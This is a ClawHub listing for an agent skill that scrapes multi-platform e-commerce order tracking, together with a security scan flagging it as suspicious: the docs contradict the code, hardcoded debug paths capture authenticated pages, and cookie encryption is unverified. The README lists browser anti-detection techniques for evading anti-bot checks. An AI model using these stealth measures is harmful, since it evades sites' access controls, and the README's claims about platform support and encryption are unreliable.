ClawHub
Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

Ecommerce Logistics

v1.0.0

Aggregate logistics information from Taobao, JD, PDD, and Douyin. One-click query for multi-platform order tracking. Supports persistent cookie storage and Q...

0· 105·0 current·0 all-time
by@charles-lpf

Install

OpenClaw Prompt Flow

Install with OpenClaw

Best for remote or guided setup. Copy the exact prompt, then paste it into OpenClaw for charles-lpf/ecommerce-logistics.

Previewing Install & Setup.
Prompt PreviewInstall & Setup
Install the skill "Ecommerce Logistics" (charles-lpf/ecommerce-logistics) from ClawHub.
Skill page: https://clawhub.ai/charles-lpf/ecommerce-logistics
Keep the work scoped to this skill only.
After install, inspect the skill metadata and help me finish setup.
Use only the metadata you can verify from ClawHub; do not invent missing requirements.
Ask before making any broader environment changes.

Command Line

CLI Commands

Use the direct CLI path if you want to install manually and keep every step visible.

OpenClaw CLI

Bare skill slug

openclaw skills install ecommerce-logistics

ClawHub CLI

Package manager switcher

npx clawhub@latest install ecommerce-logistics
Security Scan
VirusTotalVirusTotal
Suspicious
View report →
OpenClawOpenClaw
Suspicious
medium confidence
!
Purpose & Capability
The skill's purpose is to aggregate logistics for Taobao, JD, PDD, and Douyin and the code includes adapters and a Playwright-based browser to do that — which is coherent. However the SKILL.md and feature table say JD and Douyin are unsupported due to anti-bot measures while the repository contains full JD and Douyin adapters and the aggregator queries all four platforms. That mismatch (documentation vs. code) is an inconsistency that could indicate sloppy maintenance or unexpected functionality.
!
Instruction Scope
Runtime instructions ask the user to run npm install and run the CLI; the code will launch headful/headless browsers, perform navigation, click/UI-scrape, and persist cookies. Several adapters write debug files (screenshots and full HTML) to disk — notably Douyin adapter saves screenshot and page HTML to an absolute path (/Users/charles/.ecommerce-logistics/...). Those debug writes can capture sensitive pages (including HTML containing tokens, order details) and the path is hardcoded to a specific user, meaning the skill will try to write to unexpected locations. SKILL.md claims cookies are "stored encrypted" but the actual cookie encryption/storage implementation (auth-manager) was not supplied in the truncated listing — you should verify encryption and that nothing is sent to third-party endpoints.
Install Mechanism
There is no automated install spec in registry metadata, but SKILL.md instructs running npm install in scripts/, which will install Playwright. Playwright will download browser binaries (network activity and large downloads) when installed/first-run. Dependencies come from npm and node_modules.lock references registry mirrors; no arbitrary HTTP/extract install URLs were found. This is expected for a Playwright-based tool but increases installation surface compared to an instruction-only skill.
!
Credentials
The skill declares no required env vars (only an optional ECOM_LOGISTICS_DATA_DIR), which is proportionate. However code writes cookie and debug files into a home-directory path and the Douyin adapter contains hardcoded absolute debug paths under /Users/charles/ rather than honoring the dataDir option — that is unexpected and could leak sensitive HTML/screenshots into a path that may not be on the user's system or might create files in an attacker-observable path if the username matches. No other unrelated credentials are requested in code or SKILL.md.
Persistence & Privilege
The skill persists cookies and other files to the user's filesystem (~/.ecommerce-logistics by default) which is consistent with its purpose (persistent logins). It does not request always:true. Autonomous invocation is allowed by default (platform behavior) but that is not combined with any extra high privileges here. Still, stored cookies are sensitive and must be protected; verify how auth-manager encrypts them and where keys are stored.
What to consider before installing
Key things to check before installing or running this skill: 1) Inspect auth-manager.ts to confirm cookies are actually encrypted at rest and to see where encryption keys are stored. If cookies are plaintext, do not use real accounts. 2) Remove or change hardcoded debug paths (e.g., /Users/charles/.ecommerce-logistics/...). Those lines save full HTML and screenshots of authenticated pages and may leak sensitive information. Ensure the skill uses the configured data directory (ECOM_LOGISTICS_DATA_DIR or ~/.ecommerce-logistics) rather than absolute user paths. 3) Run first in an isolated environment (VM or throwaway account) because the skill automates browsers, may download browser binaries (Playwright), and will access/hold your session cookies. 4) Verify there is no code that exfiltrates data to external endpoints (search for fetch/XHR to third-party hosts in auth-manager and stealth-browser). The provided files do not show obvious network exfiltration, but truncated files include auth-manager and stealth-browser — inspect them. 5) Be aware of site policy/legal risk: the tool purposely includes anti-detection/stealth measures to bypass anti-bot checks; this can violate terms of service of the shopping platforms. 6) Note the documentation/code mismatch about JD/Douyin support — expect behavior may differ from the README. If you need only a subset (e.g., PDD/Taobao) consider removing adapters for unsupported platforms. If you cannot review the missing files yourself, treat this skill as risky and avoid using real credentials or primary accounts until the above concerns are resolved.

Like a lobster shell, security has layers — review code before you run it.

latestvk979tw1zkg1h113ddxmrcbxrp183jmp0
105downloads
0stars
1versions
Updated 1mo ago
v1.0.0
MIT-0
@charles-lpf
latest
Download

E-commerce Logistics Aggregator(电商物流聚合)

Query order logistics from Taobao, JD.com, Pinduoduo, and Douyin with persistent authentication.

Features

  • 🔗 Multi-platform: Taobao, PDD (JD & Douyin not supported due to anti-bot)
  • 🔒 Persistent login: Cookie storage, no repeated logins
  • 🛡️ Stealth mode: Bypass basic anti-bot detection
  • ⏱️ Rate limiting: Built-in request throttling
  • 📱 QR login: Graceful handling of expired sessions
  • 🚚 In-transit filter: Only show orders currently in transit

Setup

# Install dependencies
cd scripts && npm install

# Required environment variables (optional, for headless operation)
export ECOM_LOGISTICS_DATA_DIR="$HOME/.ecommerce-logistics"

Usage

First Time: Login to Platforms

cd scripts

# Login to Taobao (opens browser for QR scan)
npm run query -- --platform taobao --login

# Login to PDD
npm run query -- --platform pdd --login

# Note: JD and Douyin are not supported due to strict anti-bot measures

Query Logistics

# Query all platforms (requires prior login)
npm run query -- --all

# Query specific platform
npm run query -- --platform taobao
npm run query -- --platform pdd

# Query with custom data directory
npm run query -- --all --data-dir /path/to/cookies

# Run in headless mode (no browser window)
npm run query -- --all --headless

QR Login Process

When cookies are missing or expired:

  1. The skill opens a browser window with the platform login page
  2. A QR code screenshot is saved to ~/.ecommerce-logistics/{platform}-qr.png
  3. Scan the QR code with the platform's mobile app
  4. Complete login in the browser window
  5. Cookies are automatically saved for future use

Note: If you see "Cookie 已过期,需要重新登录", run the login command again.

Cookie Storage

Cookies are stored encrypted in:

  • Default: ~/.ecommerce-logistics/cookies/
  • Each platform has separate cookie file
  • Auto-refresh on expiration

Architecture

scripts/src/
├── index.ts              # CLI entry
├── core/
│   ├── aggregator.ts     # Main orchestrator
│   ├── auth-manager.ts   # Cookie & QR login
│   ├── rate-limiter.ts   # Request throttling
│   └── stealth-browser.ts # Anti-detection browser
├── adapters/
│   ├── base-adapter.ts   # Abstract base class
│   ├── taobao-adapter.ts
│   ├── jd-adapter.ts
│   ├── pdd-adapter.ts
│   └── douyin-adapter.ts
└── types/
    └── index.ts          # TypeScript interfaces

references/
└── selectors.md          # Platform-specific CSS selectors

Error Handling

ErrorHandling
Cookie expiredPrompt QR re-login
Rate limitedAuto-backoff retry
Login page detectedGraceful error with instructions
Network timeout3 retries with exponential backoff

Platform Support Status

PlatformStatusNotes
Taobao✅ AvailableOrder list + logistics info
JD❌ UnsupportedAnti-bot detection too strict
PDD✅ AvailableOrder list + tracking number + pickup code
Douyin❌ UnsupportedRequires mobile app access

Implementation Notes

Anti-Detection Measures

The skill implements several stealth techniques:

  1. navigator.webdriver override - Hides automation flag
  2. Plugins spoofing - Simulates real browser plugins
  3. Viewport & User-Agent - Uses realistic desktop/mobile profiles
  4. Permissions API - Overrides notification permissions
  5. Playwright-specific cleanup - Removes __playwright properties

Rate Limiting

Each platform has independent rate limits:

PlatformMax RequestsWindow
Taobao1060s
JD1560s
PDD860s
Douyin1060s

Cookie Expiration

  • Cookies are considered expired after 30 days
  • Expired cookies trigger QR re-login prompt
  • Each platform stores cookies independently

Development

Updating Selectors

Platform websites change frequently. Update selectors in:

  • references/selectors.md - Documentation
  • src/adapters/*-adapter.ts - Implementation

Testing

# Compile TypeScript
cd scripts && npm run build

# Run in development mode
npm run dev -- --platform taobao

# Debug with visible browser
npm run query -- --platform taobao --headless=false

Comments

Loading comments...